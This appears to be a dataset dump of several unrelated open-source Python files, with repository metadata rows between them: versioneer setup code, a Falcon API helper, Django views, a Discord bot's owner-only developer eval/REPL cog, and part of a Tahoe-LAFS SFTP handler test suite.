cfg = get_config_from_root(root)
except (EnvironmentError, configparser.NoSectionError,
configparser.NoOptionError) as e:
if isinstance(e, (EnvironmentError, configparser.NoSectionError)):
print("Adding sample versioneer config to setup.cfg",
file=sys.stderr)
with open(os.path.join(root, "setup.cfg"), "a") as f:
f.write(SAMPLE_CONFIG)
print(CONFIG_ERROR, file=sys.stderr)
return 1
print(" creating %s" % cfg.versionfile_source)
with open(cfg.versionfile_source, "w") as f:
LONG = LONG_VERSION_PY[cfg.VCS]
f.write(LONG % {"DOLLAR": "$",
"STYLE": cfg.style,
"TAG_PREFIX": cfg.tag_prefix,
"PARENTDIR_PREFIX": cfg.parentdir_prefix,
"VERSIONFILE_SOURCE": cfg.versionfile_source,
})
ipy = os.path.join(os.path.dirname(cfg.versionfile_source),
"__init__.py")
if os.path.exists(ipy):
try:
with open(ipy, "r") as f:
old = f.read()
except EnvironmentError:
old = ""
if INIT_PY_SNIPPET not in old:
print(" appending to %s" % ipy)
with open(ipy, "a") as f:
f.write(INIT_PY_SNIPPET)
else:
print(" %s unmodified" % ipy)
else:
print(" %s does not exist, ok" % ipy)
ipy = None
# Make sure both the top-level "versioneer.py" and versionfile_source
# (PKG/_version.py, used by runtime code) are in MANIFEST.in, so
# they'll be copied into source distributions. Pip will not be able to
# install the package without this.
manifest_in = os.path.join(root, "MANIFEST.in")
simple_includes = set()
try:
with open(manifest_in, "r") as f:
for line in f:
if line.startswith("include "):
for include in line.split()[1:]:
simple_includes.add(include)
except EnvironmentError:
pass
# That does not cover everything MANIFEST.in can do
# (http://docs.python.org/2/distutils/sourcedist.html#commands), so
# it might give some false negatives. Appending redundant 'include'
# lines is safe, though.
if "versioneer.py" not in simple_includes:
print(" appending 'versioneer.py' to MANIFEST.in")
with open(manifest_in, "a") as f:
f.write("include versioneer.py\n")
else:
print(" 'versioneer.py' already in MANIFEST.in")
if cfg.versionfile_source not in simple_includes:
print(" appending versionfile_source ('%s') to MANIFEST.in" %
cfg.versionfile_source)
with open(manifest_in, "a") as f:
f.write("include %s\n" % cfg.versionfile_source)
else:
print(" versionfile_source already in MANIFEST.in")
# Make VCS-specific changes. For git, this means creating/changing
# .gitattributes to mark _version.py for export-subst keyword
# substitution.
do_vcs_install(manifest_in, cfg.versionfile_source, ipy)
return 0
def scan_setup_py():
"""Validate the contents of setup.py against Versioneer's expectations."""
found = set()
setters = False
errors = 0
with open("setup.py", "r") as f:
for line in f.readlines():
if "import versioneer" in line:
found.add("import")
if "versioneer.get_cmdclass()" in line:
found.add("cmdclass")
if "versioneer.get_version()" in line:
found.add("get_version")
if "versioneer.VCS" in line:
setters = True
if "versioneer.versionfile_source" in line:
setters = True
if len(found) != 3:
print("")
print("Your setup.py appears to be missing some important items")
print("(but I might be wrong). Please make sure it has something")
print("roughly like the following:")
print("")
print(" import versioneer")
print(" setup( version=versioneer.get_version(),")
print(" cmdclass=versioneer.get_cmdclass(), ...)")
print("")
errors += 1
if setters:
print("You should remove lines like 'versioneer.VCS = ' and")
print("'versioneer.versionfile_source = ' . This configuration")
print("now lives in setup.cfg, and should be removed from setup.py")
print("")
errors += 1
return errors
if __name__ == "__main__":
cmd = sys.argv[1]
if cmd == "setup":
errors = do_setup()
errors += scan_setup_py()
if errors:
sys.exit(1)
| bsd-3-clause | 7,394,031,660,277,220,000 | 36.671789 | 79 | 0.613815 | false |
getefesto/efesto | efesto/Api.py | 1 | 1093 | # -*- coding: utf-8 -*-
from efesto.Generator import Generator
from efesto.handlers import Collections, Items
import falcon
class Api:
def __init__(self, **kwargs):
self.api = falcon.API(**kwargs)
@staticmethod
def collection(model):
return Collections(model)
@staticmethod
def item(model):
return Items(model)
def list_route(self, endpoint, model):
self.api.add_route(endpoint, self.collection(model))
def object_route(self, endpoint, model):
route = '{}/{}'.format(endpoint, '{id}')
self.api.add_route(route, self.item(model))
def add_endpoint(self, endpoint, model):
self.list_route(endpoint, model)
self.object_route(endpoint, model)
def dynamic_endpoints(self, types):
generator = Generator()
for dynamic_type in types:
model = generator.generate(dynamic_type)
self.add_endpoint('/{}'.format(dynamic_type.name), model)
def cherries(self):
"""
This method is the cherry on the cake
"""
return self.api
| gpl-3.0 | 8,956,973,960,251,535,000 | 25.02381 | 69 | 0.617566 | false |
andersonjonathan/Navitas | navitas/contents/views.py | 1 | 2048 | import json
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.http import HttpResponse
from django.http import HttpResponseRedirect
from django.shortcuts import render, get_object_or_404
from django.utils.translation import check_for_language, activate
from contents.forms import ImageForm
from contents.models import TextContent, FrontPageImage
def landing(request):
return render(request, 'contents/landing.html', {"images": FrontPageImage.objects.all()})
def set_language(request):
next_page = request.GET.get('next', None)
lang_code = request.GET.get('lang', None)
if not next_page:
next_page = '/'
else:
next_page = next_page[3:]
if lang_code and check_for_language(lang_code):
activate(lang_code)
next_page = '/' + lang_code + next_page
response = HttpResponseRedirect(next_page)
return response
def text_content(request, url):
content = get_object_or_404(TextContent, url=url)
return render(request, 'contents/content.html', {'content': content})
@login_required
def administration(request):
return render(request, 'contents/administration.html', {'text_content': TextContent.objects.all()})
@login_required
def upload_image(request):
res = {'status': "Default error"}
if request.method == 'POST':
form = ImageForm(request.POST, request.FILES)
if form.is_valid():
ins = form.save()
ins.refresh_from_db()
res['status'] = "ok"
res['url'] = ins.get_absolute_url()
return HttpResponse(json.dumps(res))
@login_required
def model_form_upload(request):
if request.method == 'POST':
form = ImageForm(request.POST, request.FILES)
if form.is_valid():
form.save()
return render(request, 'contents/landing.html', {"images": FrontPageImage.objects.all()})
else:
form = ImageForm()
return render(request, 'contents/model_form_upload.html', {
'form': form
}) | mit | -842,173,136,335,333,800 | 27.068493 | 103 | 0.668945 | false |
palmtree5/Red-DiscordBot | redbot/core/dev_commands.py | 2 | 12729 | import ast
import asyncio
import aiohttp
import inspect
import io
import textwrap
import traceback
import types
import re
from contextlib import redirect_stdout
from copy import copy
import discord
from . import checks, commands
from .commands import NoParseOptional as Optional
from .i18n import Translator, cog_i18n
from .utils.chat_formatting import pagify
from .utils.predicates import MessagePredicate
"""
Notice:
95% of the below code came from R.Danny which can be found here:
https://github.com/Rapptz/RoboDanny/blob/master/cogs/repl.py
"""
_ = Translator("Dev", __file__)
START_CODE_BLOCK_RE = re.compile(r"^((```py(thon)?)(?=\s)|(```))")
@cog_i18n(_)
class Dev(commands.Cog):
"""Various development focused utilities."""
async def red_delete_data_for_user(self, **kwargs):
"""
Because despite my best efforts to advise otherwise,
people use ``--dev`` in production
"""
return
def __init__(self):
super().__init__()
self._last_result = None
self.sessions = {}
self.env_extensions = {}
@staticmethod
def async_compile(source, filename, mode):
return compile(source, filename, mode, flags=ast.PyCF_ALLOW_TOP_LEVEL_AWAIT, optimize=0)
@staticmethod
async def maybe_await(coro):
for i in range(2):
if inspect.isawaitable(coro):
coro = await coro
else:
return coro
return coro
@staticmethod
def cleanup_code(content):
"""Automatically removes code blocks from the code."""
# remove ```py\n```
if content.startswith("```") and content.endswith("```"):
return START_CODE_BLOCK_RE.sub("", content)[:-3]
# remove `foo`
return content.strip("` \n")
@classmethod
def get_syntax_error(cls, e):
"""Format a syntax error to send to the user.
Returns a string representation of the error formatted as a codeblock.
"""
if e.text is None:
return cls.get_pages("{0.__class__.__name__}: {0}".format(e))
return cls.get_pages(
"{0.text}\n{1:>{0.offset}}\n{2}: {0}".format(e, "^", type(e).__name__)
)
@staticmethod
def get_pages(msg: str):
"""Pagify the given message for output to the user."""
return pagify(msg, delims=["\n", " "], priority=True, shorten_by=10)
@staticmethod
def sanitize_output(ctx: commands.Context, input_: str) -> str:
"""Hides the bot's token from a string."""
token = ctx.bot.http.token
return re.sub(re.escape(token), "[EXPUNGED]", input_, re.I)
def get_environment(self, ctx: commands.Context) -> dict:
env = {
"bot": ctx.bot,
"ctx": ctx,
"channel": ctx.channel,
"author": ctx.author,
"guild": ctx.guild,
"message": ctx.message,
"asyncio": asyncio,
"aiohttp": aiohttp,
"discord": discord,
"commands": commands,
"_": self._last_result,
"__name__": "__main__",
}
for name, value in self.env_extensions.items():
try:
env[name] = value(ctx)
except Exception as e:
traceback.clear_frames(e.__traceback__)
env[name] = e
return env
@commands.command()
@checks.is_owner()
async def debug(self, ctx, *, code):
"""Evaluate a statement of python code.
The bot will always respond with the return value of the code.
If the return value of the code is a coroutine, it will be awaited,
and the result of that will be the bot's response.
Note: Only one statement may be evaluated. Using certain restricted
keywords, e.g. yield, will result in a syntax error. For multiple
lines or asynchronous code, see [p]repl or [p]eval.
Environment Variables:
ctx - command invocation context
bot - bot object
channel - the current channel object
author - command author's member object
message - the command's message object
discord - discord.py library
commands - redbot.core.commands
_ - The result of the last dev command.
"""
env = self.get_environment(ctx)
code = self.cleanup_code(code)
try:
compiled = self.async_compile(code, "<string>", "eval")
result = await self.maybe_await(eval(compiled, env))
except SyntaxError as e:
await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
return
except Exception as e:
await ctx.send_interactive(
self.get_pages("{}: {!s}".format(type(e).__name__, e)), box_lang="py"
)
return
self._last_result = result
result = self.sanitize_output(ctx, str(result))
await ctx.send_interactive(self.get_pages(result), box_lang="py")
@commands.command(name="eval")
@checks.is_owner()
async def _eval(self, ctx, *, body: str):
"""Execute asynchronous code.
This command wraps code into the body of an async function and then
calls and awaits it. The bot will respond with anything printed to
stdout, as well as the return value of the function.
The code can be within a codeblock, inline code or neither, as long
as they are not mixed and they are formatted correctly.
Environment Variables:
ctx - command invocation context
bot - bot object
channel - the current channel object
author - command author's member object
message - the command's message object
discord - discord.py library
commands - redbot.core.commands
_ - The result of the last dev command.
"""
env = self.get_environment(ctx)
body = self.cleanup_code(body)
stdout = io.StringIO()
to_compile = "async def func():\n%s" % textwrap.indent(body, " ")
try:
compiled = self.async_compile(to_compile, "<string>", "exec")
exec(compiled, env)
except SyntaxError as e:
return await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
func = env["func"]
result = None
try:
with redirect_stdout(stdout):
result = await func()
except:
printed = "{}{}".format(stdout.getvalue(), traceback.format_exc())
else:
printed = stdout.getvalue()
await ctx.tick()
if result is not None:
self._last_result = result
msg = "{}{}".format(printed, result)
else:
msg = printed
msg = self.sanitize_output(ctx, msg)
await ctx.send_interactive(self.get_pages(msg), box_lang="py")
@commands.group(invoke_without_command=True)
@checks.is_owner()
async def repl(self, ctx):
"""Open an interactive REPL.
The REPL will only recognise code as messages which start with a
backtick. This includes codeblocks, and as such multiple lines can be
evaluated.
"""
if ctx.channel.id in self.sessions:
if self.sessions[ctx.channel.id]:
await ctx.send(
_("Already running a REPL session in this channel. Exit it with `quit`.")
)
else:
await ctx.send(
_(
"Already running a REPL session in this channel. Resume the REPL with `{}repl resume`."
).format(ctx.prefix)
)
return
env = self.get_environment(ctx)
env["__builtins__"] = __builtins__
env["_"] = None
self.sessions[ctx.channel.id] = True
await ctx.send(
_(
"Enter code to execute or evaluate. `exit()` or `quit` to exit. `{}repl pause` to pause."
).format(ctx.prefix)
)
while True:
response = await ctx.bot.wait_for("message", check=MessagePredicate.regex(r"^`", ctx))
if not self.sessions[ctx.channel.id]:
continue
cleaned = self.cleanup_code(response.content)
if cleaned in ("quit", "exit", "exit()"):
await ctx.send(_("Exiting."))
del self.sessions[ctx.channel.id]
return
executor = None
if cleaned.count("\n") == 0:
# single statement, potentially 'eval'
try:
code = self.async_compile(cleaned, "<repl session>", "eval")
except SyntaxError:
pass
else:
executor = eval
if executor is None:
try:
code = self.async_compile(cleaned, "<repl session>", "exec")
except SyntaxError as e:
await ctx.send_interactive(self.get_syntax_error(e), box_lang="py")
continue
env["message"] = response
stdout = io.StringIO()
msg = ""
try:
with redirect_stdout(stdout):
if executor is None:
result = types.FunctionType(code, env)()
else:
result = executor(code, env)
result = await self.maybe_await(result)
except:
value = stdout.getvalue()
msg = "{}{}".format(value, traceback.format_exc())
else:
value = stdout.getvalue()
if result is not None:
msg = "{}{}".format(value, result)
env["_"] = result
elif value:
msg = "{}".format(value)
msg = self.sanitize_output(ctx, msg)
try:
await ctx.send_interactive(self.get_pages(msg), box_lang="py")
except discord.Forbidden:
pass
except discord.HTTPException as e:
await ctx.send(_("Unexpected error: `{}`").format(e))
@repl.command(aliases=["resume"])
async def pause(self, ctx, toggle: Optional[bool] = None):
"""Pauses/resumes the REPL running in the current channel"""
if ctx.channel.id not in self.sessions:
await ctx.send(_("There is no currently running REPL session in this channel."))
return
if toggle is None:
toggle = not self.sessions[ctx.channel.id]
self.sessions[ctx.channel.id] = toggle
if toggle:
await ctx.send(_("The REPL session in this channel has been resumed."))
else:
await ctx.send(_("The REPL session in this channel is now paused."))
@commands.command()
@checks.is_owner()
async def mock(self, ctx, user: discord.Member, *, command):
"""Mock another user invoking a command.
The prefix must not be entered.
"""
msg = copy(ctx.message)
msg.author = user
msg.content = ctx.prefix + command
ctx.bot.dispatch("message", msg)
@commands.command(name="mockmsg")
@checks.is_owner()
async def mock_msg(self, ctx, user: discord.Member, *, content: str):
"""Dispatch a message event as if it were sent by a different user.
Only reads the raw content of the message. Attachments, embeds etc. are
ignored.
"""
old_author = ctx.author
old_content = ctx.message.content
ctx.message.author = user
ctx.message.content = content
ctx.bot.dispatch("message", ctx.message)
# If we change the author and content back too quickly,
# the bot won't process the mocked message in time.
await asyncio.sleep(2)
ctx.message.author = old_author
ctx.message.content = old_content
@commands.command()
@checks.is_owner()
async def bypasscooldowns(self, ctx, toggle: Optional[bool] = None):
"""Give bot owners the ability to bypass cooldowns.
Does not persist through restarts."""
if toggle is None:
toggle = not ctx.bot._bypass_cooldowns
ctx.bot._bypass_cooldowns = toggle
if toggle:
await ctx.send(_("Bot owners will now bypass all commands with cooldowns."))
else:
await ctx.send(_("Bot owners will no longer bypass all commands with cooldowns."))
| gpl-3.0 | -4,217,651,589,190,516,700 | 33.034759 | 111 | 0.553932 | false |
gsb-eng/tahoe-lafs | src/allmydata/test/test_sftp.py | 7 | 80359 |
import re, struct, traceback, time, calendar
from stat import S_IFREG, S_IFDIR
from twisted.trial import unittest
from twisted.internet import defer, reactor
from twisted.python.failure import Failure
from twisted.internet.error import ProcessDone, ProcessTerminated
from allmydata.util import deferredutil
conch_interfaces = None
sftp = None
sftpd = None
have_pycrypto = False
try:
from Crypto import Util
Util # hush pyflakes
have_pycrypto = True
except ImportError:
pass
if have_pycrypto:
from twisted.conch import interfaces as conch_interfaces
from twisted.conch.ssh import filetransfer as sftp
from allmydata.frontends import sftpd
from allmydata.interfaces import IDirectoryNode, ExistingChildError, NoSuchChildError
from allmydata.mutable.common import NotWriteableError
from allmydata.util.consumer import download_to_data
from allmydata.immutable import upload
from allmydata.mutable import publish
from allmydata.test.no_network import GridTestMixin
from allmydata.test.common import ShouldFailMixin
from allmydata.test.common_util import ReallyEqualMixin
timeout = 240
class Handler(GridTestMixin, ShouldFailMixin, ReallyEqualMixin, unittest.TestCase):
"""This is a no-network unit test of the SFTPUserHandler and the abstractions it uses."""
if not have_pycrypto:
skip = "SFTP support requires pycrypto, which is not installed"
def shouldFailWithSFTPError(self, expected_code, which, callable, *args, **kwargs):
assert isinstance(expected_code, int), repr(expected_code)
assert isinstance(which, str), repr(which)
s = traceback.format_stack()
d = defer.maybeDeferred(callable, *args, **kwargs)
def _done(res):
if isinstance(res, Failure):
res.trap(sftp.SFTPError)
self.failUnlessReallyEqual(res.value.code, expected_code,
"%s was supposed to raise SFTPError(%r), not SFTPError(%r): %s" %
(which, expected_code, res.value.code, res))
else:
print '@' + '@'.join(s)
self.fail("%s was supposed to raise SFTPError(%r), not get %r" %
(which, expected_code, res))
d.addBoth(_done)
return d
def _set_up(self, basedir, num_clients=1, num_servers=10):
self.basedir = "sftp/" + basedir
self.set_up_grid(num_clients=num_clients, num_servers=num_servers)
self.client = self.g.clients[0]
self.username = "alice"
d = self.client.create_dirnode()
def _created_root(node):
self.root = node
self.root_uri = node.get_uri()
sftpd._reload()
self.handler = sftpd.SFTPUserHandler(self.client, self.root, self.username)
d.addCallback(_created_root)
return d
def _set_up_tree(self):
u = publish.MutableData("mutable file contents")
d = self.client.create_mutable_file(u)
d.addCallback(lambda node: self.root.set_node(u"mutable", node))
def _created_mutable(n):
self.mutable = n
self.mutable_uri = n.get_uri()
d.addCallback(_created_mutable)
d.addCallback(lambda ign:
self.root._create_and_validate_node(None, self.mutable.get_readonly_uri(), name=u"readonly"))
d.addCallback(lambda node: self.root.set_node(u"readonly", node))
def _created_readonly(n):
self.readonly = n
self.readonly_uri = n.get_uri()
d.addCallback(_created_readonly)
gross = upload.Data("0123456789" * 101, None)
d.addCallback(lambda ign: self.root.add_file(u"gro\u00DF", gross))
def _created_gross(n):
self.gross = n
self.gross_uri = n.get_uri()
d.addCallback(_created_gross)
small = upload.Data("0123456789", None)
d.addCallback(lambda ign: self.root.add_file(u"small", small))
def _created_small(n):
self.small = n
self.small_uri = n.get_uri()
d.addCallback(_created_small)
small2 = upload.Data("Small enough for a LIT too", None)
d.addCallback(lambda ign: self.root.add_file(u"small2", small2))
def _created_small2(n):
self.small2 = n
self.small2_uri = n.get_uri()
d.addCallback(_created_small2)
empty_litdir_uri = "URI:DIR2-LIT:"
# contains one child which is itself also LIT:
tiny_litdir_uri = "URI:DIR2-LIT:gqytunj2onug64tufqzdcosvkjetutcjkq5gw4tvm5vwszdgnz5hgyzufqydulbshj5x2lbm"
unknown_uri = "x-tahoe-crazy://I_am_from_the_future."
d.addCallback(lambda ign: self.root._create_and_validate_node(None, empty_litdir_uri, name=u"empty_lit_dir"))
def _created_empty_lit_dir(n):
self.empty_lit_dir = n
self.empty_lit_dir_uri = n.get_uri()
self.root.set_node(u"empty_lit_dir", n)
d.addCallback(_created_empty_lit_dir)
d.addCallback(lambda ign: self.root._create_and_validate_node(None, tiny_litdir_uri, name=u"tiny_lit_dir"))
def _created_tiny_lit_dir(n):
self.tiny_lit_dir = n
self.tiny_lit_dir_uri = n.get_uri()
self.root.set_node(u"tiny_lit_dir", n)
d.addCallback(_created_tiny_lit_dir)
d.addCallback(lambda ign: self.root._create_and_validate_node(None, unknown_uri, name=u"unknown"))
def _created_unknown(n):
self.unknown = n
self.unknown_uri = n.get_uri()
self.root.set_node(u"unknown", n)
d.addCallback(_created_unknown)
fall_of_the_Berlin_wall = calendar.timegm(time.strptime("1989-11-09 20:00:00 UTC", "%Y-%m-%d %H:%M:%S %Z"))
md = {'mtime': fall_of_the_Berlin_wall, 'tahoe': {'linkmotime': fall_of_the_Berlin_wall}}
d.addCallback(lambda ign: self.root.set_node(u"loop", self.root, metadata=md))
return d
def test_basic(self):
d = self._set_up("basic")
def _check(ign):
# Test operations that have no side-effects, and don't need the tree.
version = self.handler.gotVersion(3, {})
self.failUnless(isinstance(version, dict))
self.failUnlessReallyEqual(self.handler._path_from_string(""), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("."), [])
self.failUnlessReallyEqual(self.handler._path_from_string("//"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/."), [])
self.failUnlessReallyEqual(self.handler._path_from_string("/./"), [])
self.failUnlessReallyEqual(self.handler._path_from_string("foo"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/"), [u"foo"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/bar//"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/bar//"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/./bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("./foo/./bar"), [u"foo", u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("foo/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/foo/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler._path_from_string("/../bar"), [u"bar"])
self.failUnlessReallyEqual(self.handler.realPath(""), "/")
self.failUnlessReallyEqual(self.handler.realPath("/"), "/")
self.failUnlessReallyEqual(self.handler.realPath("."), "/")
self.failUnlessReallyEqual(self.handler.realPath("//"), "/")
self.failUnlessReallyEqual(self.handler.realPath("/."), "/")
self.failUnlessReallyEqual(self.handler.realPath("/./"), "/")
self.failUnlessReallyEqual(self.handler.realPath("foo"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("/foo"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("foo/"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("/foo/"), "/foo")
self.failUnlessReallyEqual(self.handler.realPath("foo/bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/bar//"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/bar//"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/./bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("./foo/./bar"), "/foo/bar")
self.failUnlessReallyEqual(self.handler.realPath("foo/../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("/foo/../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("../bar"), "/bar")
self.failUnlessReallyEqual(self.handler.realPath("/../bar"), "/bar")
d.addCallback(_check)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "_path_from_string invalid UTF-8",
self.handler._path_from_string, "\xFF"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "realPath invalid UTF-8",
self.handler.realPath, "\xFF"))
return d
def test_convert_error(self):
self.failUnlessReallyEqual(sftpd._convert_error(None, "request"), None)
d = defer.succeed(None)
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error SFTPError",
sftpd._convert_error, Failure(sftp.SFTPError(sftp.FX_FAILURE, "foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "_convert_error NoSuchChildError",
sftpd._convert_error, Failure(NoSuchChildError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error ExistingChildError",
sftpd._convert_error, Failure(ExistingChildError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "_convert_error NotWriteableError",
sftpd._convert_error, Failure(NotWriteableError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "_convert_error NotImplementedError",
sftpd._convert_error, Failure(NotImplementedError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "_convert_error EOFError",
sftpd._convert_error, Failure(EOFError("foo")), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_EOF, "_convert_error defer.FirstError",
sftpd._convert_error, Failure(defer.FirstError(
Failure(sftp.SFTPError(sftp.FX_EOF, "foo")), 0)), "request"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_FAILURE, "_convert_error AssertionError",
sftpd._convert_error, Failure(AssertionError("foo")), "request"))
return d
def test_not_implemented(self):
d = self._set_up("not_implemented")
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "readLink link",
self.handler.readLink, "link"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "makeLink link file",
self.handler.makeLink, "link", "file"))
return d
def _compareDirLists(self, actual, expected):
actual_list = sorted(actual)
expected_list = sorted(expected)
self.failUnlessReallyEqual(len(actual_list), len(expected_list),
"%r is wrong length, expecting %r" % (actual_list, expected_list))
for (a, b) in zip(actual_list, expected_list):
(name, text, attrs) = a
(expected_name, expected_text_re, expected_attrs) = b
self.failUnlessReallyEqual(name, expected_name)
self.failUnless(re.match(expected_text_re, text),
"%r does not match %r in\n%r" % (text, expected_text_re, actual_list))
self._compareAttributes(attrs, expected_attrs)
def _compareAttributes(self, attrs, expected_attrs):
# It is ok for there to be extra actual attributes.
# TODO: check times
for e in expected_attrs:
self.failUnless(e in attrs, "%r is not in\n%r" % (e, attrs))
self.failUnlessReallyEqual(attrs[e], expected_attrs[e],
"%r:%r is not %r in\n%r" % (e, attrs[e], expected_attrs[e], attrs))
def test_openDirectory_and_attrs(self):
d = self._set_up("openDirectory_and_attrs")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openDirectory small",
self.handler.openDirectory, "small"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openDirectory unknown",
self.handler.openDirectory, "unknown"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openDirectory nodir",
self.handler.openDirectory, "nodir"))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openDirectory nodir/nodir",
self.handler.openDirectory, "nodir/nodir"))
gross = u"gro\u00DF".encode("utf-8")
expected_root = [
('empty_lit_dir', r'dr-xr-xr-x .* 0 .* empty_lit_dir$', {'permissions': S_IFDIR | 0555}),
(gross, r'-rw-rw-rw- .* 1010 .* '+gross+'$', {'permissions': S_IFREG | 0666, 'size': 1010}),
# The fall of the Berlin wall may have been on 9th or 10th November 1989 depending on the gateway's timezone.
#('loop', r'drwxrwxrwx .* 0 Nov (09|10) 1989 loop$', {'permissions': S_IFDIR | 0777}),
('loop', r'drwxrwxrwx .* 0 .* loop$', {'permissions': S_IFDIR | 0777}),
('mutable', r'-rw-rw-rw- .* 0 .* mutable$', {'permissions': S_IFREG | 0666}),
('readonly', r'-r--r--r-- .* 0 .* readonly$', {'permissions': S_IFREG | 0444}),
('small', r'-rw-rw-rw- .* 10 .* small$', {'permissions': S_IFREG | 0666, 'size': 10}),
('small2', r'-rw-rw-rw- .* 26 .* small2$', {'permissions': S_IFREG | 0666, 'size': 26}),
('tiny_lit_dir', r'dr-xr-xr-x .* 0 .* tiny_lit_dir$', {'permissions': S_IFDIR | 0555}),
('unknown', r'\?--------- .* 0 .* unknown$', {'permissions': 0}),
]
d.addCallback(lambda ign: self.handler.openDirectory(""))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("loop"))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("loop/loop"))
d.addCallback(lambda res: self._compareDirLists(res, expected_root))
d.addCallback(lambda ign: self.handler.openDirectory("empty_lit_dir"))
d.addCallback(lambda res: self._compareDirLists(res, []))
# The UTC epoch may either be in Jan 1 1970 or Dec 31 1969 depending on the gateway's timezone.
expected_tiny_lit = [
('short', r'-r--r--r-- .* 8 (Jan 01 1970|Dec 31 1969) short$', {'permissions': S_IFREG | 0444, 'size': 8}),
]
d.addCallback(lambda ign: self.handler.openDirectory("tiny_lit_dir"))
d.addCallback(lambda res: self._compareDirLists(res, expected_tiny_lit))
d.addCallback(lambda ign: self.handler.getAttrs("small", True))
d.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d.addCallback(lambda ign: self.handler.setAttrs("small", {}))
d.addCallback(lambda res: self.failUnlessReallyEqual(res, None))
d.addCallback(lambda ign: self.handler.getAttrs("small", True))
d.addCallback(lambda attrs: self._compareAttributes(attrs, {'permissions': S_IFREG | 0666, 'size': 10}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_OP_UNSUPPORTED, "setAttrs size",
self.handler.setAttrs, "small", {'size': 0}))
d.addCallback(lambda ign: self.failUnlessEqual(sftpd.all_heisenfiles, {}))
d.addCallback(lambda ign: self.failUnlessEqual(self.handler._heisenfiles, {}))
return d
def test_openFile_read(self):
d = self._set_up("openFile_read")
d.addCallback(lambda ign: self._set_up_tree())
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_BAD_MESSAGE, "openFile small 0 bad",
self.handler.openFile, "small", 0, {}))
# attempting to open a non-existent file should fail
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile nofile READ nosuch",
self.handler.openFile, "nofile", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_NO_SUCH_FILE, "openFile nodir/file READ nosuch",
self.handler.openFile, "nodir/file", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown READ denied",
self.handler.openFile, "unknown", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown/file READ denied",
self.handler.openFile, "unknown/file", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile tiny_lit_dir READ denied",
self.handler.openFile, "tiny_lit_dir", sftp.FXF_READ, {}))
d.addCallback(lambda ign:
self.shouldFailWithSFTPError(sftp.FX_PERMISSION_DENIED, "openFile unknown uri READ denied",
